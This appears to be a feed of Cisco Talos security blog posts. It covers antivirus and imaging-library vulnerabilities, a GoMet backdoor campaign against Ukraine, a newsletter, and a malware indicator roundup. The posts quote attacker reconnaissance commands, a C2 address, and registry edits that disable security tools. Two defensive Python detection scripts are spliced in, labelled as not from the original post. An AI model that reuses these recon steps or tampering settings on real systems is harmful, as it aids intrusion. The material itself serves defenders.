
Vulnerability Spotlight: Vulnerabilities in Alyac antivirus program could stop virus scanning, cause code execution

3 August 2022 at 18:46


Jaewon Min of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. 

Update (Aug. 3, 2022): Talos disclosed two new vulnerabilities in the Alyac antivirus software and added their details to this post.

Cisco Talos recently discovered out-of-bounds read and buffer overflow vulnerabilities in ESTsecurity Corp.’s Alyac antivirus software that could cause a denial-of-service condition or arbitrary code execution. Alyac is an antivirus software developed for Microsoft Windows machines. 

TALOS-2022-1452 (CVE-2022-21147) is a vulnerability that exists in a specific Alyac module that, eventually, leads to a crash of Alyac’s scanning process, which effectively neutralizes the antivirus scan. If successful, an attacker could trigger this vulnerability to stop the program from scanning for malware, which would be crucial in a potential attack scenario. 

TALOS-2022-1527 (CVE-2022-32543) and TALOS-2022-1533 (CVE-2022-29886) are heap-based buffer overflow vulnerabilities that an attacker could exploit to execute arbitrary code on the targeted machine. The adversary would have to convince a user to open a specially crafted OLE file to trigger this condition.

Cisco Talos worked with ESTsecurity to ensure that these issues are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

Users are encouraged to update these affected products as soon as possible: ESTsoft Alyac, versions 2.5.7.7 and 2.5.8.544. Talos tested and confirmed ESTsoft Alyac, version 2.5.7.7, is affected by TALOS-2022-1452. Version 2.5.8.544 is vulnerable to TALOS-2022-1533 and TALOS-2022-1527.

The following Snort rules will detect exploitation attempts against these vulnerabilities: 59014, 59015, and 60035 - 60042. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org. 

EMEAR Monthly Talos Update: Training the next generation of cybersecurity researchers

15 July 2022 at 14:37

Cisco Talos and Cisco Secure have the latest edition of the Talos EMEAR Threat Update series out now, which you can watch above or over at this link, where Martin Lee and Hazel Burton talk about the cybersecurity skills gap that currently exists and how we can better train the next generation of defenders. Martin provides some insight into why diversity in security hiring is important, whether it be based on background, experience, age, race or anything else. 

Vulnerability Spotlight: Issue in Accusoft ImageGear could lead to memory corruption, code execution

19 July 2022 at 12:45



Emmanuel Tacheau of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw. 

Cisco Talos recently discovered a use-after-free vulnerability in Accusoft ImageGear's PSD header processing function. 

The ImageGear library is a document-imaging developer toolkit that allows users to create, edit, annotate and convert various images. It supports more than 100 file formats such as DICOM, PDF and Microsoft Office. 

This vulnerability, TALOS-2022-1526 (CVE-2022-29465), could allow an attacker to cause a use-after-free condition by tricking the targeted user into opening a malformed .psd file in the application. The vulnerability leads to out-of-bounds heap writes, which cause memory corruption and, possibly, code execution.

In adherence to Cisco’s vulnerability disclosure policy, Accusoft patched this issue and released an update for ImageGear.

Talos tested and confirmed Accusoft ImageGear, version 19.10, is affected by this vulnerability. 

The following Snort rules will detect exploitation attempts against this vulnerability: 60228 and 60229. Additional rules may be released in the future and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your Cisco Secure Firewall Management Center or Snort.org. 

Attackers target Ukraine using GoMet backdoor

21 July 2022 at 12:00



Executive summary


Since the Russian invasion of Ukraine began, Ukrainians have been under a nearly constant barrage of cyber attacks. Working jointly with Ukrainian organizations, Cisco Talos has discovered a fairly uncommon piece of malware targeting Ukraine — this time aimed at a large software development company whose software is used in various state organizations within Ukraine. We believe that this campaign is likely sourced by Russian state-sponsored actors or those acting in their interests. As this firm is involved in software development, we cannot ignore the possibility that the perpetrating threat actor's intent was to gain access to source a supply chain-style attack, though at this time we do not have any evidence that they were successful. Cisco Talos confirmed that the malware is a slightly modified version of the open-source backdoor named "GoMet." The malware was first observed on March 28, 2022.


GoMet backdoor


The story of this backdoor is rather curious — there are two documented cases of its usage by sophisticated threat actors. First, in 2020, attackers were deploying this malware after the successful exploitation of CVE-2020-5902, a vulnerability in F5 BIG-IP so severe that USCYBERCOM posted a tweet urging all users to patch the application. The second is more recent and involved the successful exploitation of CVE-2022-1040, a remote code execution vulnerability in Sophos Firewall.

Both cases are very similar. They both start with the exploitation of a public vulnerability on appliances where the malicious actors then dropped GoMet as a backdoor. As of publishing time, Cisco Talos has no reason to believe these cases are related to the usage of this backdoor in Ukraine.

The original GoMet author posted the code on GitHub on March 31, 2019 and made commits until April 2, 2019. The commits didn't add any features but did fix some code-convention aesthetics. The backdoor itself is a rather simple piece of software written in the Go programming language. It contains nearly all the usual functions an attacker might want in a remotely controlled agent. Agents can be deployed on a variety of operating systems (OS) and architectures (amd64, arm, etc.). GoMet supports job scheduling (via cron or the task scheduler, depending on the OS), single command execution, file download, file upload and opening a shell. Another notable feature of GoMet is its ability to daisy chain connections from one implanted host to another, whereby the attackers gain access to a network or machine and then use that foothold to reach further networks and computers. Such a feature could allow communication out to the internet from otherwise completely "isolated" hosts.

The malicious actors changed this version: in the original code, the cron job is configured to execute once every hour, on the hour, whereas in our samples it is configured to run every two seconds. This makes the sample slightly noisier, but it also avoids an hour-long sleep after a failed connection, allowing far more aggressive reconnection to the C2.

The cron job defined in the main part of the malware checks whether the agent is connected to the C2; if not, it starts the agent component again and reconnects to the C2. The picture below shows the execution flow of the C2 setup routine Agent.Start.


This flow reveals another change from the GitHub version. If the C2 is unreachable, the sample sleeps for a random amount of time between five and 10 minutes. Go's sleep implementation takes its duration in nanoseconds, so the pseudo-code looks like the following: time_Sleep(1000000000 * (rnd_val + 300)).

The 'WaitGroup_Add' call in the disassembly screenshot can also be confusing. The trick is that the Go compiler turns the source call WaitGroup.Done() into WaitGroup.Add(-1).

After the Agent.Start routine finishes, the next cron job triggers the execution of the serve() routine and tries to start another instance of the agent.

The simplified source code of the GitHub version looks like this:



The simplified pseudo-code for the samples in the wild looks like this:



Talos found two samples of this version of the backdoor:

f24158c5132943fbdeee4de4cedd063541916175434f82047b6576f86897b1cb (FctSec.exe)

950ba2cc9b1dfaadf6919e05c854c2eaabbacb769b2ff684de11c3094a03ee88 (SQLocalM86.exe)

These samples have minor differences but are likely built from the same source code, just with a slightly different configuration.

If we look closely at the functions, they are not 100% equal, but we can see that the changes are mainly strings and similar victim or compiler-dependent data, along with researcher comments. Below is the Main.Main function as an example.



The malicious activity we detected included a fake Windows Update scheduled task created by the GoMet dropper. Additionally, the malware used a somewhat novel approach to persistence: it enumerated the existing autorun values and, instead of creating a new one, replaced one of the existing goodware autorun executables with the malware. This could avoid detection or hinder forensic analysis.
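One way to hunt for the autorun-replacement persistence described above, as an added example that is not Talos's code: it diffs a snapshot of Run/RunOnce entries against a trusted baseline and flags entries whose registry value name and path are unchanged but whose target file now hashes differently. The baseline and snapshot below are constructed, and the winreg collector only runs on Windows.

```python
"""Hunting check for the autorun-replacement persistence described above: the
registry value name and path stay the same, but the executable behind them has
been swapped.  A snapshot of Run/RunOnce entries is diffed against a trusted
baseline.  Sample data below is constructed; the collector is Windows-only."""
import hashlib
import os
from dataclasses import dataclass

RUN_KEYS = (r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
            r"SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce")


@dataclass(frozen=True)
class AutorunEntry:
    hive: str        # "HKLM" or "HKCU"
    key: str         # one of RUN_KEYS
    value_name: str  # registry value name, e.g. "OneDrive"
    path: str        # executable the value launches
    sha256: str      # digest of that file on disk, "" if missing


def sha256_of_file(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()


def extract_image_path(command):
    """Executable path from an autorun command line (quoted, or first token)."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def compare_autoruns(baseline, current):
    """Return (finding, entry) pairs: 'replaced_binary' (same value and path,
    different hash), 'retargeted' (path changed), 'new_entry' (not in baseline)."""
    base = {(e.hive, e.key, e.value_name): e for e in baseline}
    findings = []
    for e in current:
        old = base.get((e.hive, e.key, e.value_name))
        if old is None:
            findings.append(("new_entry", e))
        elif old.path.lower() != e.path.lower():
            findings.append(("retargeted", e))
        elif old.sha256 != e.sha256:
            findings.append(("replaced_binary", e))
    return findings


def collect_autoruns_windows():
    """Enumerate HKLM/HKCU Run and RunOnce values with the stdlib winreg module
    (importable only on Windows); feed the result to compare_autoruns()."""
    import winreg
    hives = (("HKLM", winreg.HKEY_LOCAL_MACHINE), ("HKCU", winreg.HKEY_CURRENT_USER))
    entries = []
    for hive_name, hive in hives:
        for key in RUN_KEYS:
            try:
                k = winreg.OpenKey(hive, key)
            except OSError:
                continue
            i = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(k, i)
                except OSError:
                    break
                i += 1
                path = extract_image_path(str(data))
                digest = sha256_of_file(path) if os.path.isfile(path) else ""
                entries.append(AutorunEntry(hive_name, key, name, path, digest))
    return entries


def _fake_hash(label):
    return hashlib.sha256(label.encode()).hexdigest()  # constructed stand-in digest


ONEDRIVE = r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
TRAY = r"C:\Windows\System32\SecurityHealthSystray.exe"
# Constructed baseline taken from a known-good machine.
SAMPLE_BASELINE = [
    AutorunEntry("HKCU", RUN_KEYS[0], "OneDrive", ONEDRIVE, _fake_hash("onedrive-good")),
    AutorunEntry("HKLM", RUN_KEYS[0], "SecurityHealth", TRAY, _fake_hash("tray-good")),
]
# Constructed current snapshot: value name and path untouched, but the file
# behind the OneDrive entry now hashes differently, as the post describes.
SAMPLE_CURRENT = [
    AutorunEntry("HKCU", RUN_KEYS[0], "OneDrive", ONEDRIVE, _fake_hash("implant")),
    AutorunEntry("HKLM", RUN_KEYS[0], "SecurityHealth", TRAY, _fake_hash("tray-good")),
]


def run_sample():
    return compare_autoruns(SAMPLE_BASELINE, SAMPLE_CURRENT)
```

A baseline is only as trustworthy as the machine it was taken from, so pair the hash diff with an Authenticode signature check on any flagged binary.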

In one of the cases, a blank CMD process is opened about 60 seconds before the schtasks query runs, and that cmd.exe then executes the systeminfo and schtasks queries itself, rather than the queries being spawned in a chain from svchost, services or another process. The execution looks like this:

C:\WINDOWS\system32\cmd.exe
systeminfo
schtasks /query /tn microsoft\windows\windowsupdate\scheduled
schtasks /query /tn microsoft\windows\windowsupdate\scheduled /v
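Detection logic for the process chain above, as an added example that is not from the Talos post: it runs over constructed Sysmon-style process-creation events (the field names ts, pid, ppid, image and cmdline are an assumption) and flags any cmd.exe whose children run systeminfo and then query the Windows Update scheduled task within a short window, applying the check to every shell in the log rather than the single case described.

```python
"""Flag a cmd.exe whose children run systeminfo and then `schtasks /query`
for the Windows Update task within WINDOW seconds, the recon sequence the
post describes.  Events below are constructed, Sysmon Event ID 1 shaped."""
from datetime import datetime, timedelta

SAMPLE_EVENTS = [  # constructed sample telemetry, not real data
    {"ts": "2022-03-28T10:00:00", "pid": 4100, "ppid": 800,
     "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    # Suspicious chain: blank cmd.exe, then systeminfo, then the task queries ~60 s later.
    {"ts": "2022-03-28T10:01:00", "pid": 5120, "ppid": 2004,
     "image": r"C:\WINDOWS\system32\cmd.exe", "cmdline": r"C:\WINDOWS\system32\cmd.exe"},
    {"ts": "2022-03-28T10:01:30", "pid": 5130, "ppid": 5120,
     "image": r"C:\Windows\System32\systeminfo.exe", "cmdline": "systeminfo"},
    {"ts": "2022-03-28T10:02:00", "pid": 5140, "ppid": 5120,
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /query /tn microsoft\windows\windowsupdate\scheduled"},
    {"ts": "2022-03-28T10:02:01", "pid": 5141, "ppid": 5120,
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /query /tn microsoft\windows\windowsupdate\scheduled /v"},
    # Benign: an admin opens cmd from explorer and runs systeminfo alone.
    {"ts": "2022-03-28T11:00:00", "pid": 6000, "ppid": 300,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"ts": "2022-03-28T11:00:05", "pid": 6010, "ppid": 6000,
     "image": r"C:\WINDOWS\system32\cmd.exe", "cmdline": "cmd.exe"},
    {"ts": "2022-03-28T11:00:10", "pid": 6020, "ppid": 6010,
     "image": r"C:\Windows\System32\systeminfo.exe", "cmdline": "systeminfo"},
]

TASK_PATH = r"microsoft\windows\windowsupdate\scheduled"
WINDOW = timedelta(seconds=90)  # the post reports ~60 s between cmd.exe and the query


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_gomet_recon(events):
    """Return one finding per cmd.exe pid that matches the sequence, with the
    parent image (if logged) so an analyst can see what opened the shell."""
    events = sorted(events, key=lambda e: e["ts"])
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for shell in events:
        if _basename(shell["image"]) != "cmd.exe":
            continue
        start = datetime.fromisoformat(shell["ts"])
        children = [c for c in events if c["ppid"] == shell["pid"]
                    and timedelta(0) <= datetime.fromisoformat(c["ts"]) - start <= WINDOW]
        ran_sysinfo = any(_basename(c["image"]) == "systeminfo.exe" for c in children)
        task_queries = [c["cmdline"] for c in children
                        if _basename(c["image"]) == "schtasks.exe"
                        and "/query" in c["cmdline"].lower()
                        and TASK_PATH in c["cmdline"].lower()]
        if ran_sysinfo and task_queries:
            parent = by_pid.get(shell["ppid"])
            findings.append({"cmd_pid": shell["pid"],
                             "parent_image": parent["image"] if parent else "<unknown>",
                             "task_queries": task_queries})
    return findings
```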



Infrastructure


Both samples have the command and control (C2) IP address hardcoded, which is 111.90.139[.]122. Communication occurs via HTTPS on the default port.

The certificate on this server was issued on April 4, 2021 as a self-signed certificate, with the 9b5e112e683a3605c9481d8f565cfb3b7e2feab7 SHA-1 fingerprint. This indicates that this campaign preparation began as early as April 2021. At the moment, there are no known domains associated with this IP address and the last time there was a domain associated with it was on Jan. 23, 2021, which is outside the known attack time frame.


Conclusion


As the war in Ukraine rages on with little resolution in sight, we are reminded that attackers will try just about anything to gain additional leverage over their Ukrainian adversaries. Cisco Talos expects to see the continued deployment of a range of cyber weapons targeting the Ukrainian government and its counterparts. We remain vigilant and are committed to helping Ukraine defend its networks against such cyber attacks and working closely with our strategic allies in the region to gather and provide actionable threat intelligence.

In this instance, we saw a software company targeted with a backdoor designed for additional persistent access. We also observed the threat actor take active steps to prevent detection of their tooling by obfuscating samples and utilizing novel persistence techniques. This access could be leveraged in a variety of ways, including deeper access or launching additional attacks, including the potential for software supply chain compromise. It's a reminder that although the cyber activities haven't necessarily risen to the level many have expected, Ukraine is still facing a well-funded, determined adversary that can inflict damage in a variety of ways — this is just the latest example of those attempts.

We assess with moderate to high confidence that these actions are being conducted by Russian state-sponsored actors or those acting in their interests.


Coverage


Ways our customers can detect and block this threat are listed below.


Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.


Indicators of Compromise

SHA-256 Hashes

f24158c5132943fbdeee4de4cedd063541916175434f82047b6576f86897b1cb
950ba2cc9b1dfaadf6919e05c854c2eaabbacb769b2ff684de11c3094a03ee88


IPs

111.90.139[.]122



Threat Source newsletter (July 21, 2022) — No topic is safe from being targeted by fake news and disinformation

21 July 2022 at 18:00

By Jon Munshaw. 

Welcome to this week’s edition of the Threat Source newsletter. 

I could spend time in this newsletter every week talking about fake news. There are always so many ridiculous memes, headlines, misleading stories, viral Facebook posts and manipulated media that I see come across my Instagram feed or via my wife when she shows me TikToks she favorited. 

One recent event, though, was so crushing to me that I had to call it out specifically. Former Japanese Prime Minister Shinzo Abe was assassinated earlier this month while making a campaign speech in public. This was a horrible tragedy marking the death of a powerful politician in one of the world’s most influential countries. It was the top story in the world for several days and was even more shocking given Japan’s strict gun laws and the relative infrequency of any global leaders being the target of violence. 

It took no time for the internet at large to take this tragedy and immediately try to spin it to their whims to spread false narratives, disinformation and downright harmful fake stories that mar Abe’s death and make a mockery of the 24/7 news cycle and the need for everyone to immediately have their own “take” on social media. 

Shortly after Abe’s murder, a far-right French politician took a false claim from the infamous online forum 4chan that video game developer Hideo Kojima was the suspect who killed Abe and shared it on Twitter. The politician, Damien Rieu, even went so far as to connect Kojima to the “far left,” linking to pictures of the “Metal Gear Solid” creator wearing a shirt depicting the Joker and a bag with Che Guevara’s face on it. Rieu’s tweet was taken as fact by a Greek television news station, which also aired a report that Kojima was the assassin.

Thankfully, this claim was quickly debunked and the politician issued an apology, but Kojima and his company have threatened legal action over the ordeal (as they should). This is an appalling scenario in which social media was quick to assign blame for Abe’s assassination, then picked up by an influential person and even making it to a reputable international news station. This goes beyond the realm of the typical “Russian bot” fake news we think of; this was a failure to run any simple fact checks before reporting a damning claim about someone. Imagine if it was just anyone who was blamed for Abe’s assassination, and not someone like Kojima who has a very public platform and the funds to fight these claims.

People also took the opportunity within the first few hours of Abe’s death to try and craft their own narrative using fake news and misleading information. A viral claim that he was killed over his COVID-19-related policies made the rounds, though these claims were later proven verifiably false. Another completely fake and manipulated screenshot claimed to show that Abe had tweeted shortly before his death that he had incriminating news about U.S. politician Hillary Clinton.  

I went on Instagram and found a still-active post from an account with more than 54,000 followers that indicates that Abe was assassinated because he had less-than-strict COVID policies that did not align with the “global agenda.” Instagram flagged the post as “missing context,” but does not flag it as downright false and the content is still accessible as of Wednesday afternoon.  

What disturbs me the most about this whole event is that nothing is off limits for social media users to bend to their whim. I suppose I can't say I’m surprised — ESPN even recently fell for something as silly as a fake TikTok video alleging to show a UPS driver dunking a basketball while jumping over a car. But it is a stark reminder that when breaking news occurs, no matter how serious or dangerous it is, there are always going to be people online who will be spreading fake news, disinformation and/or misinformation. This makes me miss the days when the biggest fake news story out there was Balloon Boy.

  

The one big thing 


The U.S. Cybersecurity and Infrastructure Security Agency is asking all federal agencies to patch an actively exploited Microsoft vulnerability disclosed last week. Because CISA added CVE-2022-22047, an elevation of privilege vulnerability affecting the Windows Client Server Runtime Subsystem (CSRSS), to its list of known exploited vulnerabilities, agencies are compelled to patch the issue by Aug. 2. Microsoft and CISA both say attackers are actively exploiting the issue in the wild.

Why do I care? 

This vulnerability is the only one disclosed as part of last week’s Patch Tuesday that’s been exploited in the wild. An attacker could exploit this vulnerability to execute code on the targeted machine as SYSTEM. However, they would need physical access to a machine to exploit the issue. That being said, if CISA is warning users that it’s being actively exploited in the wild, it’s as good a time as any to remember to patch.

So now what? 

Our Patch Tuesday blog post contains links to Microsoft’s updates for Patch Tuesday and a rundown of other vulnerabilities you should know about. Additionally, we have multiple Snort rules that can detect attempts to exploit CVE-2022-22047.  

 

Other news of note


The U.S. Department of Homeland Security declared the Log4shell vulnerability is “endemic” and will present a risk to organizations for at least the next decade. A new report into the major vulnerability in Log4j declared that the open-source community does not have enough resources to properly secure its code and needs the public and private sector to assist with the implementation of patches. They also warned that there are still many instances of vulnerable software that attackers could take advantage of. The DHS report also says the original vulnerable code could have been detected in 2013 had the reviewers had the time and the appropriate cybersecurity knowledge to spot the flaw. That being said, the investigating panel said there were no major cyber attacks against U.S. critical infrastructure leveraging Log4shell. (Dark Reading, Associated Press, ZDNet)

The European Union is warning that increased cyber attacks from Russian state-sponsored actors run the risk of unnecessary escalation and spillover effects to all of Europe. A formal EU declaration says that member nations “strongly condemn this unacceptable behaviour in cyberspace and express solidarity with all countries that have fallen victim.” A Lithuanian energy firm was the recent target of a distributed denial-of-service attack that the country said was the largest cyber attack in a decade. Belgian leaders also say their country was recently targeted by several Chinese state-sponsored groups. (Bleeping Computer, Council of the European Union, Infosecurity Magazine)

A relatively small botnet is suspected to be behind more than 3,000 recent distributed denial-of-service attacks. The Mantis botnet, which is suspected to be an evolution of Meris, has already targeted users in Germany, Taiwan, South Korea, Japan, the U.S. and the U.K. Most recently, it launched a malware campaign against Android users in France, using malicious SMS messages to lure victims into downloading malware that adds devices to the botnet’s growing system. Security researchers say users have already downloaded the malware about 90,000 times. (Bleeping Computer, ZDNet)


Can’t get enough Talos? 


Upcoming events where you can find Talos 


A New HOPE (July 22 - 24, 2022)
New York City 

CTIR On Air (July 28, 2022)
Talos Twitter, LinkedIn and YouTube pages

BlackHat U.S. (Aug. 6 - 11, 2022)
Las Vegas, Nevada 

DEF CON U.S. (Aug. 11 - 14, 2022)
Las Vegas, Nevada 


Most prevalent malware files from Talos telemetry over the past week  


MD5: 2915b3f8b703eb744fc54c81f4a9c67f   
Typical Filename: VID001.exe   
Claimed Product: N/A   
Detection Name: Win.Worm.Coinminer::1201 

SHA 256: e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg  

MD5: a087b2e6ec57b08c0d0750c60f96a74c     
Typical Filename: AAct.exe     
Claimed Product: N/A       
Detection Name: PUA.Win.Tool.Kmsauto::1201  

MD5: 5741eadfc89a1352c61f1ff0a5c01c06  
Typical Filename: 3.exe  
Claimed Product: N/A
Detection Name: W32.DFC.MalParent  

MD5: 2c8ea737a232fd03ab80db672d50a17a    
Typical Filename: LwssPlayer.scr    
Claimed Product: 梦想之巅幻灯播放器    
Detection Name: Auto.125E12.241442.in02    

Threat Roundup for July 15 to July 22

22 July 2022 at 21:51

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between July 15 and July 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Virus.Ramnit-9957454-0 | Virus | Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It can also steal browser cookies and hide from popular antivirus software.
Win.Malware.Kovter-9957371-0 | Malware | Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Ransomware.TeslaCrypt-9957356-0 | Ransomware | TeslaCrypt is a well-known ransomware family that encrypts a user's files with strong encryption and demands Bitcoin in exchange for a file decryption service. A flaw in the encryption algorithm was discovered that allowed files to be decrypted without paying the extortion request, and eventually, the malware developers released the master key allowing all encrypted files to be recovered easily.
Win.Dropper.Shiz-9957241-0 | Dropper | Shiz is a remote access trojan that allows an attacker to access an infected machine to harvest sensitive information. It is commonly spread via droppers or by victims visiting a malicious site.
Win.Dropper.Zeus-9957126-0 | Dropper | Zeus is a trojan that steals information such as banking credentials using methods such as key-logging and form-grabbing.
Win.Dropper.Tofsee-9957067-0 | Dropper | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the botnet and send large volumes of spam messages to infect additional systems and increase the size of the botnet under the operator's control.
Win.Packed.Nanocore-9957022-0 | Packed | Nanocore is a .NET remote access trojan. Its source code has been leaked several times, making it widely available. Like other RATs, it allows full control of the system, including recording video and audio, stealing passwords, downloading files and recording keystrokes.
Win.Dropper.LokiBot-9957019-0 | Dropper | Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature and can steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.

Threat Breakdown

Win.Virus.Ramnit-9957454-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 16 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: AntiVirusOverride | 16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: AntiVirusDisableNotify | 16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: FirewallDisableNotify | 16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: FirewallOverride | 16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: UpdatesDisableNotify | 16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER, Value Name: UacDisableNotify | 16
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM, Value Name: EnableLUA | 16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE, Value Name: EnableFirewall | 16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE, Value Name: DoNotAllowExceptions | 16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE, Value Name: DisableNotifications | 16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC, Value Name: Start | 16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND, Value Name: Start | 16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC, Value Name: Start | 16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION, Value Name: jfghdug_ooetvtgk | 16
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: JudCsgdy | 16
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV, Value Name: Start | 16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: Windows Defender | 16
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON, Value Name: Userinit | 16
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON, Value Name: Userinit | 16

File Hashes


Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection: Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK (images not included)


Win.Malware.Kovter-9957371-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE, Value Name: DisableOSUpgrade | 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE, Value Name: ReservationsAllowed | 25
<HKLM>\SOFTWARE\WOW6432NODE\XVYG, Value Name: xedvpa | 25
<HKCU>\SOFTWARE\XVYG, Value Name: xedvpa | 25
<HKCR>\.8CA9D79 | 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: vrxzdhbyv | 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN, Value Name: ssishoff | 25
<HKLM>\SOFTWARE\WOW6432NODE\XVYG, Value Name: tbqjcmuct | 25
<HKCU>\SOFTWARE\XVYG, Value Name: tbqjcmuct | 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE | 25
<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE | 25
<HKCU>\SOFTWARE\XVYG | 25
<HKLM>\SOFTWARE\WOW6432NODE\XVYG | 25
<HKCR>\C3B616 | 25
<HKCR>\C3B616\SHELL | 25
<HKCR>\C3B616\SHELL\OPEN | 25
<HKCR>\C3B616\SHELL\OPEN\COMMAND | 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103, Value Name: CheckSetting | 25
